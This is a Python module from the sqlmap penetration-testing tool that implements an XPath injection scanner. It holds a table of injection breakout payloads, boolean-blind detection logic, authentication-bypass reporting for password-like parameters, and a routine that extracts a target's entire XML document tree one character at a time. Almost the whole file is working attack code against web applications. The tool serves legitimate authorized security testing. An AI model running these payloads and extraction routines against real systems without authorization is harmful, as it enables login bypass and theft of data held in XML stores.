#!/usr/bin/env python """ Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ import difflib import re import time from collections import namedtuple from lib.core.common import beep from lib.core.common import randomStr from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import logger from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import PLACE from lib.core.settings import UPPER_RATIO_BOUND from lib.core.settings import XPATH_CHAR_MAX from lib.core.settings import XPATH_CHAR_MIN from lib.core.settings import XPATH_ERROR_REGEX from lib.core.settings import XPATH_ERROR_SIGNATURES from lib.core.settings import XPATH_MAX_DEPTH from lib.core.settings import XPATH_MAX_LENGTH from lib.request.connect import Connect as Request from lib.utils.xrange import xrange SENTINEL = randomStr(length=10, lowercase=True) XPATH_PLACES = (PLACE.GET, PLACE.POST, PLACE.CUSTOM_POST) # Each detection breakout is paired with a false variant and an (optional) extraction # boundary. The boundary carries a prefix/suffix pair that wraps the extraction # predicate so the surrounding template stays syntactically valid. # # Breakouts are listed in detection-priority order: function-argument closers first, # then simple string, double-quoted, union wildcard, and bare numeric/boolean. _BREAKOUT_TABLE = ( # (breakout, false_variant, extraction_prefix, extraction_suffix ) # -- function-argument (closes paren + string) ------------------------------------------------------------ ("') or true() or ('", "') and false() and ('", "') or ", " or ('"), ("') or '1'='1' or ('", "') and '1'='2' and ('", "') or ", " or ('"), ("') or 1=1 or ('", "') and 1=2 and ('", "') or ", " or ('"), # -- single-quoted string (suffix absorbs trailing quote; predicate decisive when original value unmatched) ("' or '1'='1", "' and '1'='2", "' or ", " and '1'='1"), ("' or true() or '", "' and false() and '", "' or ", " and '1'='1"), ("' or 1=1 or '", "' and 1=2 and '", "' or ", " and '1'='1"), # -- AND context (single-quoted) ------------------------------------------------------------------------- ("' and '1'='1", "' and '1'='2", "' and ", " and '1'='1"), # -- double-quoted string (suffix absorbs trailing quote) ------------------------------------------------- ('" or "1"="1', '" and "1"="2', '" or ', ' and "1"="1'), ('" or true() or "', '" and false() and "', '" or ', ' and "1"="1'), # -- double-quoted function-argument --------------------------------------------------------------------- ('") or true() or ("', '") and false() and ("', '") or ', ' or ("'), # -- union wildcard (detection-only, no extraction) ------------------------------------------------------ ("']|//*|test['", None, None, None), # -- numeric / bare context (extraction uses 'and'; requires original value to not match anything) ---------- (" or 1=1", " and 1=2", " and ", ""), (" or true()", " and false()", " and ", ""), ) # Boundary: a verified injection boundary with an extraction prefix+suffix and an # extractable flag. Only extractable boundaries can drive tree-walking. Boundary = namedtuple("Boundary", ("prefix", "suffix", "extractable")) # Convenience lookups built from _BREAKOUT_TABLE _BREAKOUT_FALSE_MAP = {} _BREAKOUT_BOUNDARY = {} _BREAKOUT_LIST = [] for _entry in _BREAKOUT_TABLE: _bk, _fv, _pfx, _sfx = _entry _BREAKOUT_LIST.append(_bk) _BREAKOUT_FALSE_MAP[_bk] = _fv if _pfx is not None: _BREAKOUT_BOUNDARY[_bk] = Boundary(_pfx, _sfx, True) else: _BREAKOUT_BOUNDARY[_bk] = None XPATH_BREAKOUT_PREFIXES = tuple(_BREAKOUT_LIST) Slot = namedtuple("Slot", ("place", "parameter", "backend", "oracle", "template", "payload", "boundary")) Slot.__new__.__defaults__ = (None, None, None, None, None, None, None) def _ratio(first, second): return difflib.SequenceMatcher(None, first or "", second or "").quick_ratio() def _delim(place): return (conf.cookieDel or ';') if place == PLACE.COOKIE else '&' def _confParameters(place): try: return conf.parameters.get(place, "") except AttributeError: return conf.parameters[place] if place in conf.parameters else "" def _originalValue(place, parameter): for segment in _confParameters(place).split(_delim(place)): name, _, value = segment.partition('=') if name.strip() == parameter: return value return conf.paramDict.get(place, {}).get(parameter) or "" def _replaceSegment(place, parameter, value): delimiter = _delim(place) raw = _confParameters(place) retVal, replaced = [], False for part in raw.split(delimiter): name, _, _ = part.partition('=') if not replaced and name.strip() == parameter: retVal.append("%s=%s" % (name, value)) replaced = True else: retVal.append(part) if not replaced: retVal = [] for name, oldValue in conf.paramDict.get(place, {}).items(): retVal.append("%s=%s" % (name, value if name == parameter else oldValue)) return delimiter.join(retVal) def _send(place, parameter, value): """Issue a single HTTP request with the target parameter set to `value`. Temporarily mutates conf.parameters so sqlmap's normal request machinery (URL construction, cookies, headers, encodings) is fully preserved.""" if conf.delay: time.sleep(conf.delay) old_params = conf.parameters.get(place, "") conf.parameters[place] = _replaceSegment(place, parameter, value) try: kwargs = {"raise404": False, "silent": True} if conf.verbose >= 3: logger.log(CUSTOM_LOGGING.PAYLOAD, "%s=%s" % (parameter, value)) page, _, _ = Request.getPage(**kwargs) return page or "" except Exception as ex: logger.debug("XPath probe request failed: %s" % getUnicode(ex)) return "" finally: conf.parameters[place] = old_params def _isError(page): return bool(re.search(XPATH_ERROR_REGEX, getUnicode(page or ""))) def _backendFromError(page): page = getUnicode(page or "") for backend, regex in XPATH_ERROR_SIGNATURES: if re.search(regex, page): return backend return "Generic XPath" if _isError(page) else None def _probeBackendByParserError(place, parameter): """Probe for XPath parser errors to obtain a backend hint. This is NOT authoritative detection -- only a boolean oracle confirms injection.""" original = _originalValue(place, parameter) or "x" normal = _send(place, parameter, original) for suffix in ("'", '"', "')", '")', "]", "|"): payload = original + suffix broken = _send(place, parameter, payload) if not normal or _ratio(normal, broken) >= UPPER_RATIO_BOUND: continue backend = _backendFromError(broken) if backend and not _isError(normal): return backend, payload return None, None def _boolean(truthy, falsy): """Return the reproducible true page when true/false probes diverge. Both true AND false pages must be independently reproducible.""" truePage = truthy() if truePage is None or _isError(truePage): return None truePage2 = truthy() if _ratio(truePage, truePage2) < UPPER_RATIO_BOUND: return None falsePage = falsy() if falsePage is None or _isError(falsePage): return None falsePage2 = falsy() if _ratio(falsePage, falsePage2) < UPPER_RATIO_BOUND: return None if _ratio(truePage, falsePage) < UPPER_RATIO_BOUND: return truePage return None def _makePayload(original, boundary, predicate): """Construct a payload by inserting `predicate` into the verified boundary.""" if boundary.suffix: return "%s%s%s%s" % (original, boundary.prefix, predicate, boundary.suffix) return "%s%s%s" % (original, boundary.prefix, predicate) def _detectBoolean(place, parameter): """Return (template, payload, boundary) for boolean-blind XPath injection. boundary is None for detection-only breakouts (wildcard, union).""" original = _originalValue(place, parameter) or "" for breakout in XPATH_BREAKOUT_PREFIXES: truePayload = original + breakout falseVariant = _BREAKOUT_FALSE_MAP.get(breakout) if not falseVariant: continue falseSpecific = original + falseVariant template = _boolean(lambda p=truePayload: _send(place, parameter, p), lambda p=falseSpecific: _send(place, parameter, p)) if template: boundary = _BREAKOUT_BOUNDARY.get(breakout) return template, truePayload, boundary # Wildcard: only useful for bool differentiation, not enumeration if original: template = _boolean(lambda: _send(place, parameter, "*"), lambda: _send(place, parameter, SENTINEL)) if template: return template, "*", None return None, None, None def _isPasswordParam(parameter): parameter = getUnicode(parameter or "").lower() return any(_ in parameter for _ in ("pass", "pwd", "secret", "pin", "cred", "key", "token", "auth")) def _fingerprintByError(backend): if not backend: return None for name, _ in XPATH_ERROR_SIGNATURES: if name in backend: return name return backend def _xpathQuote(s): """Quote a string for an XPath string literal, choosing the delimiter that requires no escaping. When both quotes appear, use concat().""" s = getUnicode(s) if "'" not in s: return "'%s'" % s if '"' not in s: return '"%s"' % s # both quote types present: use concat() with " as outer delimiter return "concat(%s)" % ", '\"', ".join('"%s"' % part for part in s.split('"')) class _XPathPayloadBuilder(object): """Build XPath boolean predicates for blind tree-walking using the verified injection boundary from detection. Each method returns a complete payload.""" def __init__(self, original, boundary): self.original = original or "x" self.boundary = boundary def _make(self, predicate): return _makePayload(self.original, self.boundary, predicate) def nameStartsWith(self, path, prefix): return self._make("starts-with(name(%s),%s)" % (path, _xpathQuote(prefix))) def nameLength(self, path, length): return self._make("string-length(name(%s))=%d" % (path, length)) def childCount(self, path, count): return self._make("count(%s/*)>=%d" % (path, count)) def attributeCount(self, path, count): return self._make("count(%s/@*)>=%d" % (path, count)) def attributeNameStartsWith(self, path, index, prefix): return self._make("starts-with(name(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix))) def attributeValueStartsWith(self, path, index, prefix): return self._make("starts-with(string(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix))) def textStartsWith(self, path, prefix): return self._make("starts-with(string(%s),%s)" % (path, _xpathQuote(prefix))) def _makeOracle(place, parameter, template): """Build an oracle from a verified true template. extract(payload) returns True when the response is closer to the true template than to the false page.""" cache = {} def request(payload): if payload not in cache: cache[payload] = _send(place, parameter, payload) return cache[payload] falsePage = request(SENTINEL) def oracle(payload): page = request(payload) if page is None or _isError(page): return False return _ratio(template, page) >= UPPER_RATIO_BOUND def extract(payload): page = request(payload) if page is None or _isError(page): return False trueRatio = _ratio(template, page) falseRatio = _ratio(falsePage, page) # Require either an unambiguous match against the template or a # clear separation from the false page (minimum 5 %pt margin) return trueRatio >= UPPER_RATIO_BOUND or (trueRatio - falseRatio) > 0.05 oracle.extract = extract oracle.template = template oracle.falsePage = falsePage oracle.cache = cache return oracle # Frequency-ordered charset for blind character extraction. # Excludes characters that are XPath metacharacters or problematic in URL context. _META_ORDS = set(ord(_) for _ in ("'", '"', '[', ']', '<', '>', '&', '/')) _FREQ = (tuple(xrange(ord('a'), ord('z') + 1)) + tuple(xrange(ord('A'), ord('Z') + 1)) + tuple(xrange(ord('0'), ord('9') + 1)) + tuple(ord(_) for _ in "@._-+ ")) _CHARSET = [] for _ in _FREQ: if XPATH_CHAR_MIN <= _ <= XPATH_CHAR_MAX and _ not in _META_ORDS and _ not in _CHARSET: _CHARSET.append(_) for _ in xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1): if _ not in _META_ORDS and _ not in _CHARSET: _CHARSET.append(_) def _inferValue(oracle, builder, path, getter, maxLen=XPATH_MAX_LENGTH): """Blindly infer a string value at `path` using `getter(builder, path, prefix)`. Returns the recovered value or None.""" value = "" probes = 0 for _ in xrange(maxLen): found = False for cp in _CHARSET: candidate = value + chr(cp) probes += 1 if oracle.extract(getter(builder, path, candidate)): value = candidate found = True break if not found: break if value.endswith(" "): value = value.rstrip() break logger.debug("XPath blind inference: %d probes (length=%d)" % (probes, len(value))) return value if value else None def _inferCount(oracle, builder, path, countFn, maxCount=128): """Binary search for a count value using predicate 'count(...)>=N'.""" if not oracle.extract(countFn(builder, path, 1)): return 0 lo, hi = 1, maxCount while lo < hi: mid = (lo + hi + 1) // 2 if oracle.extract(countFn(builder, path, mid)): lo = mid else: hi = mid - 1 return lo def _walkTree(oracle, builder, path="/*", depth=0): """Recursively walk the XML tree from a given XPath expression. Returns a dict: {name, path, children, attributes, text} or None.""" if depth > XPATH_MAX_DEPTH: return None name = _inferValue(oracle, builder, path, lambda b, p, prefix: b.nameStartsWith(p, prefix)) if not name: return None logger.info("discovered element: '%s'" % name) childCount = _inferCount(oracle, builder, path, lambda b, p, c: b.childCount(p, c), maxCount=32) attrCount = _inferCount(oracle, builder, path, lambda b, p, c: b.attributeCount(p, c), maxCount=16) attributes = [] for i in xrange(1, attrCount + 1): attrName = _inferValue(oracle, builder, path, lambda b, p, prefix, idx=i: b.attributeNameStartsWith(p, idx, prefix)) if not attrName: continue attrValue = _inferValue(oracle, builder, path, lambda b, p, prefix, idx=i: b.attributeValueStartsWith(p, idx, prefix)) attributes.append({"name": attrName, "value": attrValue or ""}) logger.info(" attribute: @%s='%s'" % (attrName, attrValue or "")) text = None if childCount == 0: text = _inferValue(oracle, builder, path, lambda b, p, prefix: b.textStartsWith(p, prefix)) children = [] for i in xrange(1, childCount + 1): childPath = "%s/*[%d]" % (path, i) child = _walkTree(oracle, builder, childPath, depth + 1) if child: children.append(child) return { "name": name, "path": path, "children": children, "attributes": attributes, "text": text, } def _treeToTable(node): """Flatten a tree node to (columns, rows) for grid output.""" columns = ["Path", "Element", "Attribute", "Value"] rows = [] def _flatten(n, depth=0): path = n["path"] rows.append([path, n["name"], "", ""]) for attr in n.get("attributes", []): rows.append([path, n["name"], "@" + attr["name"], attr["value"]]) if n.get("text"): rows.append([path, n["name"], "text()", n["text"]]) for child in n.get("children", []): _flatten(child, depth + 1) _flatten(node) return columns, [_ for _ in rows if _[3] or _[2] not in ("", "text()")] def _grid(columns, rows): columns = [getUnicode(_) for _ in columns] rows = [[getUnicode(_) for _ in row] for row in rows] widths = [] for index, column in enumerate(columns): width = len(column) for row in rows: if index < len(row): width = max(width, len(getUnicode(row[index]))) widths.append(width) separator = "+-" + "-+-".join("-" * _ for _ in widths) + "-+" def line(cells): return "| " + " | ".join((getUnicode(cells[index]) if index < len(cells) else "").ljust(widths[index]) for index in xrange(len(columns))) + " |" return "\n".join([separator, line(columns), separator] + [line(row) for row in rows] + [separator]) def _dumpTable(title, columns, rows): if rows: conf.dumper.singleString("%s:\n%s" % (title, _grid(columns, rows))) def xpathScan(): global SENTINEL SENTINEL = randomStr(length=10, lowercase=True) infoMsg = "'--xpath' is self-contained: it detects XPath injection in HTTP " infoMsg += "parameters and walks the reachable XML document tree. SQL enumeration " infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored" logger.info(infoMsg) if not conf.paramDict: logger.error("no request parameters to test (use --data, GET params, or similar)") return tested = found = 0 slots = [] for place in (_ for _ in XPATH_PLACES if _ in conf.paramDict): for parameter in list(conf.paramDict[place].keys()): if conf.testParameter and parameter not in conf.testParameter: continue tested += 1 logger.info("testing XPath injection on %s parameter '%s'" % (place, parameter)) # Phase 1: Probe the XPath parser for a backend hint backendHint, _errorPayload = _probeBackendByParserError(place, parameter) if backendHint: backendHint = _fingerprintByError(backendHint) # Phase 2: Establish a boolean oracle (authoritative) template, payload, boundary = _detectBoolean(place, parameter) if template: if boundary and boundary.extractable: found += 1 backend = backendHint or "Generic XPath" logger.info("%s parameter '%s' is vulnerable to XPath injection (back-end: '%s')" % (place, parameter, backend)) if conf.beep: beep() oracle = _makeOracle(place, parameter, template) slots.append(Slot(place=place, parameter=parameter, backend=backend, oracle=oracle, template=template, payload=payload, boundary=boundary)) continue # Detection-only: boolean differentiation confirmed but no extraction boundary. # Report as auth bypass on credential fields; log generically otherwise. found += 1 if _isPasswordParam(parameter): title = "XPath auth bypass" logger.info("%s parameter '%s' allows XPath auth bypass (boolean differentiation confirmed)" % (place, parameter)) else: title = "XPath boolean-based blind (detection-only)" logger.info("%s parameter '%s' is vulnerable to XPath injection (detection-only, back-end: '%s')" % (place, parameter, backendHint or "Generic XPath")) if conf.beep: beep() conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (parameter, place, title, parameter, payload)) continue if backendHint: logger.info("%s parameter '%s' reaches an XPath parser (back-end: '%s'), but no exploitable boolean oracle was established" % (place, parameter, backendHint)) if not slots: if found: logger.info("XPath injection confirmed (detection-only, no extractable boundary established)") logger.info("XPath scan complete") return if tested: warnMsg = "no parameter appears to be injectable via XPath injection (%d tested)" % tested else: warnMsg = "no parameters found to test for XPath injection" logger.warning(warnMsg) return # Select the first oracle-bearing slot with an extractable boundary for tree-walking slot = next((_ for _ in slots if _.oracle and _.boundary and _.boundary.extractable), None) if not slot: logger.info("XPath scan complete") return original = _originalValue(slot.place, slot.parameter) or "x" # OR-style boundaries always-true if the original branch matches, so use a # sentinel that is guaranteed not to appear as a field value. AND-style # boundaries need the original branch to match; keep the original there. if " or " in slot.boundary.prefix: base = SENTINEL else: base = original builder = _XPathPayloadBuilder(base, slot.boundary) oracle = slot.oracle # Refine backend fingerprint if generic if not slot.backend or slot.backend == "Generic XPath": backend = _backendFromError(oracle.template) if backend: backend = _fingerprintByError(backend) if backend: logger.info("identified back-end: '%s'" % backend) slot = slot._replace(backend=backend) title = "XPath boolean-based blind" conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (slot.parameter, slot.place, title, slot.parameter, slot.payload)) # Blind XML tree-walking (attempted document-root traversal) logger.info("walking XML document tree (depth limit: %d)" % XPATH_MAX_DEPTH) root = _walkTree(oracle, builder) if root: columns, rows = _treeToTable(root) logger.info("extracted %d node(s) from XML tree" % (len(rows))) _dumpTable("XPath: %s parameter '%s' XML tree" % (slot.place, slot.parameter), columns, rows) else: warnMsg = "XPath injection is confirmed but the XML tree could not be walked. " warnMsg += "This may indicate a restricted XPath context (subtree, scalar, or predicate-only)" logger.warning(warnMsg) logger.info("XPath scan complete")